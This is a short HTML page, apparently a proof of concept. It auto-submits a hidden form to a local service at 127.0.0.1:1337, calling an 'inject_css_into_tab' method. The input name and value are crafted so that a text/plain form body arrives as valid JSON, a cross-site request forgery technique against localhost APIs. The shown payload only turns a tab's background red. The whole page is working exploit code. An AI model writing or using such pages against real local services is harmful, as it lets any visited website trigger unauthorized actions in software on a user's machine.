<form id="F" action="http://127.0.0.1:1337/methods/inject_css_into_tab" method="post" enctype="text/plain">
    <input name='{"tab":"SP","style":"*{background-color:red;}/*' value='*/"}'>
</form>
<script>
    document.getElementById("F").submit();
</script>
